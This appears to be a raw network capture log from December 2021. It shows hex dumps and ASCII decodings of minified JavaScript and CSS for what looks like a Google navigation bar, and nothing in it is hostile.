                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC141INData Raw: 28 61 2c 33 29 29 3b 64 2e 6c 5c 75 30 30 33 64 5b 5d 3b 5f 2e 45 28 62 2c 31 29 5c 75 30 30 32 36 5c 75 30 30 32 36 28 61 5c 75 30 30 33 64 5f 2e 45 28 62 2c 33 29 29 5c 75 30 30 32 36 5c 75 30 30 32 36 74 68 69 73 2e 6a 2e 70 75 73 68 28 61 29 3b 5f 2e 45 28 63 2c 31 29 5c 75 30 30 32 36 5c 75 30 30 32 36 28 63 5c 75 30 30 33 64 5f 2e 45 28 63 2c 32 29 29 5c 75 30 30 32 36 5c 75 30 30 32 36 74 68 69 73 2e 6a 2e 70 75 73 68 28 63 29 3b 5f 2e 7a 28 5c 22 67 61 70 69 2e 6c 6f 61 64 5c 22 2c 28 30 2c 5f 2e 77 29 28 74 68 69 73 2e 41 2c 74 68 69 73 29 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 5c 6e 76 61 72 20 57 64 5c 75 30 30 33 64 5f 2e 49 28 5f 2e 4c 64 2c 5f 2e 72 63 2c 31 34 29 7c 7c 6e 65 77 20 5f 2e 72 63 2c 58 64 5c 75 30 30 33 64 5f 2e 49 28 5f
                                                                                                                                                                                                                        Data Ascii: (a,3));d.l\u003d[];_.E(b,1)\u0026\u0026(a\u003d_.E(b,3))\u0026\u0026this.j.push(a);_.E(c,1)\u0026\u0026(c\u003d_.E(c,2))\u0026\u0026this.j.push(c);_.z(\"gapi.load\",(0,_.w)(this.A,this));return this};\nvar Wd\u003d_.I(_.Ld,_.rc,14)||new _.rc,Xd\u003d_.I(_
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC142INData Raw: 2e 67 62 5f 30 3a 61 63 74 69 76 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 34 33 62 32 7d 2e 67 62 5f 31 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 36 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 20 31 70 78 20 31 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 36 29 7d 2e 67 62 5f 5a 2c 2e 67 62 5f 30 2c 2e 67 62 5f 32 2c 2e 67 62 5f 33 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 38 70 78 3b 70 61 64 64 69 6e 67 3a 30 20 31 32 70 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 7d 2e 67 62 5f 32 7b 62 61
                                                                                                                                                                                                                        Data Ascii: .gb_0:active{background-color:#0043b2}.gb_1{-webkit-box-shadow:0 1px 1px rgba(0,0,0,.16);box-shadow:0 1px 1px rgba(0,0,0,.16)}.gb_Z,.gb_0,.gb_2,.gb_3{display:inline-block;line-height:28px;padding:0 12px;-webkit-border-radius:2px;border-radius:2px}.gb_2{ba
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC143INData Raw: 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 67 62 5f 74 66 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 67 62 5f 43 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 32 70 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 68 65 69 67 68 74 3a 34 30 70 78 3b 77 69 64 74 68 3a 34 30 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b
                                                                                                                                                                                                                        Data Ascii: ;vertical-align:middle}.gb_tf{position:relative}.gb_C{display:inline-block;outline:none;vertical-align:middle;-webkit-border-radius:2px;border-radius:2px;-webkit-box-sizing:border-box;box-sizing:border-box;height:40px;width:40px;color:#000;cursor:pointer;
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC145INData Raw: 67 62 5f 5a 61 2c 2e 67 62 5f 62 64 2e 67 62 5f 6c 61 20 2e 67 62 5f 45 2c 2e 67 62 5f 6c 61 2e 67 62 5f 45 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 7d 2e 67 62 5f 62 64 2e 67 62 5f 6c 61 2e 67 62 5f 75 66 20 2e 67 62 5f 58 61 2c 2e 67 62 5f 62 64 2e 67 62 5f 6c 61 2e 67 62 5f 75 66 20 2e 67 62 5f 5a 61 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 67 62 5f 76 66 7b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 72 69 67 68 74 3a 38 70 78 3b 74 6f 70 3a 36 32 70 78 3b 7a 2d 69 6e 64 65 78 3a 2d 31 7d 2e 67 62 5f 4a 61 20 2e 67 62 5f 58 61 2c 2e 67 62 5f 4a 61 20 2e 67 62 5f 5a 61 2c 2e 67 62 5f 4a 61 20 2e 67 62 5f 45 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 70 78 7d 2e 67 62 5f 62 64 3a 66 69 72 73 74 2d 63 68 69 6c 64 2c 23 67 62 73 66 77 3a
                                                                                                                                                                                                                        Data Ascii: gb_Za,.gb_bd.gb_la .gb_E,.gb_la.gb_E{display:block}.gb_bd.gb_la.gb_uf .gb_Xa,.gb_bd.gb_la.gb_uf .gb_Za{display:none}.gb_vf{position:absolute;right:8px;top:62px;z-index:-1}.gb_Ja .gb_Xa,.gb_Ja .gb_Za,.gb_Ja .gb_E{margin-top:-10px}.gb_bd:first-child,#gbsfw:
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC146INData Raw: 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 39 35 2c 39 39 2c 31 30 34 2c 30 2e 32 34 29 7d 2e 67 62 5f 43 5b 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 74 72 75 65 5d 20 2e 67 62 5f 50 65 2c 2e 67 62 5f 43 5b 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 74 72 75 65 5d 20 2e 67 62 5f 51 65 7b 66 69 6c 6c 3a 23 35 66 36 33 36 38 3b 6f 70 61 63 69 74 79 3a 31 7d 2e 67 62 5f 76 63 20 2e 67 62 5f 4e 65 20 62 75 74 74 6f 6e 3a 68 6f 76 65 72 20 73 76 67 2c 2e 67 62 5f 76 63 20 2e 67 62 5f 43 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 33 32 2c 32 33 34 2c 32 33 37 2c 30 2e 30 38 29 7d 2e 67 62 5f 76 63 20 2e 67 62 5f 4e 65 20 62 75 74 74 6f 6e 3a 66 6f 63 75 73 20
                                                                                                                                                                                                                        Data Ascii: {background-color:rgba(95,99,104,0.24)}.gb_C[aria-expanded\u003dtrue] .gb_Pe,.gb_C[aria-expanded\u003dtrue] .gb_Qe{fill:#5f6368;opacity:1}.gb_vc .gb_Ne button:hover svg,.gb_vc .gb_C:hover{background-color:rgba(232,234,237,0.08)}.gb_vc .gb_Ne button:focus
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC147INData Raw: 78 3b 6f 70 61 63 69 74 79 3a 31 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 36 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 6f 70 3a 32 70 78 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3a 31 20 31 20 61 75 74 6f 3b 66 6c 65 78 3a 31 20 31 20 61 75 74 6f 7d 2e 67 62 5f 55 63 2e 67 62 5f 56 63 7b 63 6f 6c 6f 72 3a 23 33 63 34 30 34 33 7d 2e 67 62 5f 70 61 2e 67 62 5f 71 61 20 2e 67 62 5f 55 63 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 30 7d 2e 67 62 5f 57 63 2e 67 62 5f 58 63 20 2e 67 62 5f 55 63 7b
                                                                                                                                                                                                                        Data Ascii: x;opacity:1;overflow:hidden;padding-left:16px;position:relative;text-overflow:ellipsis;vertical-align:middle;top:2px;white-space:nowrap;-webkit-flex:1 1 auto;flex:1 1 auto}.gb_Uc.gb_Vc{color:#3c4043}.gb_pa.gb_qa .gb_Uc{margin-bottom:0}.gb_Wc.gb_Xc .gb_Uc{
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC148INData Raw: 35 38 32 62 0d 0a 7d 2e 67 62 5f 70 61 2e 67 62 5f 4b 64 20 2e 67 62 5f 46 64 7b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3a 31 20 30 20 61 75 74 6f 3b 66 6c 65 78 3a 31 20 30 20 61 75 74 6f 7d 2e 67 62 5f 70 61 20 2e 67 62 5f 46 64 2e 67 62 5f 4c 64 2e 67 62 5f 4d 64 7b 6d 69 6e 2d 77 69 64 74 68 3a 30 7d 2e 67 62 5f 70 61 2e 67 62 5f 71 61 20 2e 67 62 5f 46 64 7b 70 61 64 64 69 6e 67 3a 34 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 38 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 30 7d 2e 67 62 5f 45 64 7b 68 65 69 67 68 74 3a 34 38 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d
                                                                                                                                                                                                                        Data Ascii: 582b}.gb_pa.gb_Kd .gb_Fd{-webkit-flex:1 0 auto;flex:1 0 auto}.gb_pa .gb_Fd.gb_Ld.gb_Md{min-width:0}.gb_pa.gb_qa .gb_Fd{padding:4px;padding-left:8px;min-width:0}.gb_Ed{height:48px;vertical-align:middle;white-space:nowrap;-webkit-box-align:center;-webkit-
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC150INData Raw: 66 6c 6f 61 74 3a 72 69 67 68 74 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 33 32 70 78 7d 2e 67 62 5f 53 64 20 2e 67 62 5f 51 64 2e 67 62 5f 55 64 7b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 7d 2e 67 62 5f 56 64 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6d 61 78 2d 77 69 64 74 68 3a 32 30 30 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 70 61 64 64 69 6e 67 3a 30 20 31 32 70 78 3b 74 65 78 74 2d 6f 76 65 72 66 6c 6f 77 3a 65 6c 6c 69 70 73 69 73 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 3b 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 74 65 78 74 7d 2e 67 62 5f 57 64 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 2e 34 73 3b 74 72 61 6e 73 69 74
                                                                                                                                                                                                                        Data Ascii: float:right;padding-left:32px}.gb_Sd .gb_Qd.gb_Ud{padding-left:0}.gb_Vd{font-size:14px;max-width:200px;overflow:hidden;padding:0 12px;text-overflow:ellipsis;white-space:nowrap;-webkit-user-select:text}.gb_Wd{-webkit-transition:background-color .4s;transit
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC151INData Raw: 2d 68 65 69 67 68 74 3a 31 36 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 38 70 78 3b 6d 69 6e 2d 77 69 64 74 68 3a 39 36 70 78 3b 70 61 64 64 69 6e 67 3a 39 70 78 20 32 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 7d 2e 67 62 5f 70 61 2e 67 62 5f 53 64 20 2e 67 62 5f 33 64 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 7d 23 67 62 20
                                                                                                                                                                                                                        Data Ascii: -height:16px;margin-left:10px;margin-right:8px;min-width:96px;padding:9px 23px;text-align:center;vertical-align:middle;-webkit-border-radius:4px;border-radius:4px;-webkit-box-sizing:border-box;box-sizing:border-box}.gb_pa.gb_Sd .gb_3d{margin-left:8px}#gb
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC152INData Raw: 61 72 65 6e 74 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 32 30 32 31 32 34 7d 23 67 62 20 61 2e 67 62 5f 33 64 2e 67 62 5f 32 3a 68 6f 76 65 72 2c 23 67 62 20 2e 67 62 5f 76 63 20 61 2e 67 62 5f 33 64 3a 68 6f 76 65 72 2c 23 67 62 2e 67 62 5f 76 63 20 61 2e 67 62 5f 33 64 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 38 66 62 66 66 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 63 63 65 30 66 63 7d 23 67 62 20 61 2e 67 62 5f 33 2e 67 62 5f 6a 61 2e 67 62 5f 33 64 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 39 33 62 61 66 39 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 2d 77 65 62 6b 69 74 2d 62 6f
                                                                                                                                                                                                                        Data Ascii: arent;-webkit-box-shadow:none;box-shadow:none;color:#202124}#gb a.gb_3d.gb_2:hover,#gb .gb_vc a.gb_3d:hover,#gb.gb_vc a.gb_3d:hover{background:#f8fbff;border-color:#cce0fc}#gb a.gb_3.gb_ja.gb_3d:hover{background:#93baf9;border-color:transparent;-webkit-bo
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC153INData Raw: 30 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 78 2d 68 65 69 67 68 74 3a 34 38 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 77 69 64 74 68 3a 31 33 34 70 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 38 70 78 7d 2e 67 62 5f 69 61 2e 67 62 5f 6a 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72
                                                                                                                                                                                                                        Data Ascii: 0;-webkit-box-sizing:border-box;box-sizing:border-box;cursor:pointer;display:inline-block;max-height:48px;overflow:hidden;outline:none;padding:0;vertical-align:middle;width:134px;-webkit-border-radius:8px;border-radius:8px}.gb_ia.gb_ja{background-color:tr
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC155INData Raw: 72 3a 23 66 31 66 33 66 34 3b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 38 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 30 7d 2e 67 62 5f 6d 61 2e 67 62 5f 6e 61 20 2e 67 62 5f 6f 61 7b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 67 62 5f 70 61 3a 6e 6f 74 28 2e 67 62 5f 71 61 29 20 2e 67 62 5f 69 61 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 34 70 78 7d 2e 67 62 5f 72 61 7b 6d 61 78 2d 68 65 69 67 68 74 3a 33 32 70 78 3b 77 69 64 74 68 3a 37 38 70 78 7d 2e 67 62 5f 69 61 2e 67 62 5f 6a 61 20 2e 67 62 5f 72 61 7b 6d 61 78 2d 68 65 69 67 68 74 3a 32 36 70
                                                                                                                                                                                                                        Data Ascii: r:#f1f3f4;-webkit-border-radius:4px;border-radius:4px;margin-left:8px;padding-left:0}.gb_ma.gb_na .gb_oa{vertical-align:middle}.gb_pa:not(.gb_qa) .gb_ia{margin-left:10px;margin-right:4px}.gb_ra{max-height:32px;width:78px}.gb_ia.gb_ja .gb_ra{max-height:26p
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC156INData Raw: 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 35 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 35 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 6c 65 66 74 20 30 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 6c 65 66 74 20 30 7d 2e 67 62 5f 48 61 3a 3a 62 65 66 6f 72 65 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 35 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 28 2e 35 29 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 6c 65 66 74 20 30 3b 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 6c 65 66 74 20 30 7d 2e 67 62 5f 6b 20 2e 67 62 5f 48 61 3a 3a 62 65 66 6f 72 65
                                                                                                                                                                                                                        Data Ascii: ransform:scale(.5);transform:scale(.5);-webkit-transform-origin:left 0;transform-origin:left 0}.gb_Ha::before{display:inline-block;-webkit-transform:scale(.5);transform:scale(.5);-webkit-transform-origin:left 0;transform-origin:left 0}.gb_k .gb_Ha::before
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC157INData Raw: 62 20 2e 67 62 5f 69 2e 67 62 5f 69 20 61 2e 67 62 5f 49 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 67 62 5f 69 2e 67 62 5f 69 20 2e 67 62 5f 4c 61 7b 62 6f 72 64 65 72 2d 74 6f 70 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 6f 70 61 63 69 74 79 3a 31 7d 2e 67 62 5f 44 20 2e 67 62 5f 43 61 3a 68 6f 76 65 72 2c 2e 67 62 5f 69 20 2e 67 62 5f 43 61 3a 68 6f 76 65 72 2c 2e 67 62 5f 44 20 2e 67 62 5f 43 61 3a 66 6f 63 75 73 2c 2e 67 62 5f 69 20 2e 67 62 5f 43 61 3a 66 6f 63 75 73 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 31 35 29 20 2c 20 30 20 31 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 2e 32 29 20 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28
                                                                                                                                                                                                                        Data Ascii: b .gb_i.gb_i a.gb_Ia{color:#fff}.gb_i.gb_i .gb_La{border-top-color:#fff;opacity:1}.gb_D .gb_Ca:hover,.gb_i .gb_Ca:hover,.gb_D .gb_Ca:focus,.gb_i .gb_Ca:focus{-webkit-box-shadow: 0 1px 0 rgba(0,0,0,.15) , 0 1px 2px rgba(0,0,0,.2) ;box-shadow: 0 1px 0 rgba(
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC158INData Raw: 2e 67 62 5f 70 63 2e 67 62 5f 63 65 2c 2e 67 62 5f 70 63 3a 6e 6f 74 28 2e 67 62 5f 63 65 29 3a 6e 6f 74 28 3a 66 6f 63 75 73 29 7b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 2e 67 62 5f 6f 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 67 62 5f 73 63 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 69 6d 67 2e 67 62 5f 74 63 7b 62 6f 72 64 65 72 3a 30 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 7d 2e 67 62 5f 45 63 20 2e 67 62 5f 70 63 20 2e 67 62 5f 62 65 3a 62 65 66 6f 72 65 2c 2e 67 62 5f 76 63 20 2e 67 62 5f 70 63 20 2e 67 62 5f 62 65 3a 62 65 66 6f 72 65 7b
                                                                                                                                                                                                                        Data Ascii: .gb_pc.gb_ce,.gb_pc:not(.gb_ce):not(:focus){outline:none}.gb_oa{display:inline-block;vertical-align:middle}.gb_sc{border:none;display:block;visibility:hidden}img.gb_tc{border:0;vertical-align:middle}.gb_Ec .gb_pc .gb_be:before,.gb_vc .gb_pc .gb_be:before{
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC160INData Raw: 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 34 70 78 7d 2e 67 62 5f 75 63 7b 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 30 25 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d 61 72 67 69 6e 3a 30 20 34 70 78 3b 70 61 64 64 69 6e 67 3a 31 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 68 65 69 67 68 74 3a 32 34 70 78 3b 77 69 64 74 68 3a 32 34 70 78 3b 2d 77 65 62 6b 69 74 2d 75 73 65 72 2d 73 65 6c 65 63 74 3a 6e 6f 6e 65 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 3b 66 6c 65 78 3a 30 20 30 20 61 75 74 6f 7d 2e 67
                                                                                                                                                                                                                        Data Ascii: margin-bottom:4px}.gb_uc{-webkit-border-radius:50%;border-radius:50%;display:inline-block;margin:0 4px;padding:12px;overflow:hidden;vertical-align:middle;cursor:pointer;height:24px;width:24px;-webkit-user-select:none;-webkit-flex:0 0 auto;flex:0 0 auto}.g
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC161INData Raw: 76 65 72 7b 6f 76 65 72 66 6c 6f 77 3a 76 69 73 69 62 6c 65 7d 2e 67 62 5f 41 63 2e 67 62 5f 71 61 7b 77 69 64 74 68 3a 32 36 34 70 78 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 20 2d 32 36 34 70 78 20 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 20 2d 32 36 34 70 78 20 29 7d 2e 67 62 5f 41 63 3a 6e 6f 74 28 2e 67 62 5f 71 61 29 7b 77 69 64 74 68 3a 32 38 30 70 78 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 20 2d 32 38 30 70 78 20 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 20 2d 32 38 30 70 78 20 29 7d 2e 67 62 5f 44 63 20 2e 67 62 5f 41 63 7b 77 69 64 74 68 3a 31 39 35 70 78 7d 2e 67 62 5f 41 63 2e 67 62 5f 6c 61
                                                                                                                                                                                                                        Data Ascii: ver{overflow:visible}.gb_Ac.gb_qa{width:264px;-webkit-transform:translateX( -264px );transform:translateX( -264px )}.gb_Ac:not(.gb_qa){width:280px;-webkit-transform:translateX( -280px );transform:translateX( -280px )}.gb_Dc .gb_Ac{width:195px}.gb_Ac.gb_la
                                                                                                                                                                                                                        2021-12-06 18:08:52 UTC162INData Raw: 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 35 66 36 33 36 38 7d 2e 67 62 5f 4f 63 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 2e 67 62 5f 50 63 3a 65 6d 70 74 79 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 67 62 5f 4f 63 2c 2e 67 62 5f 50 63 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 34 30 70 78 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 34 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 52 6f 62 6f 74 6f 2c 52 6f 62 6f 74 6f 44 72 61 66 74 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 38 37 29 7d 2e 67 62 5f 45 63 20 2e 67 62 5f 4f 63 7b 63 6f 6c 6f 72 3a 23 65 38
                                                                                                                                                                                                                        Data Ascii: ottom:1px solid #5f6368}.gb_Oc{cursor:pointer}.gb_Pc:empty{display:none}.gb_Oc,.gb_Pc{display:block;min-height:40px;padding-bottom:4px;padding-top:4px;font-family:Roboto,RobotoDraft,Helvetica,Arial,sans-serif;color:rgba(0,0,0,0.87)}.gb_Ec .gb_Oc{color:#e8
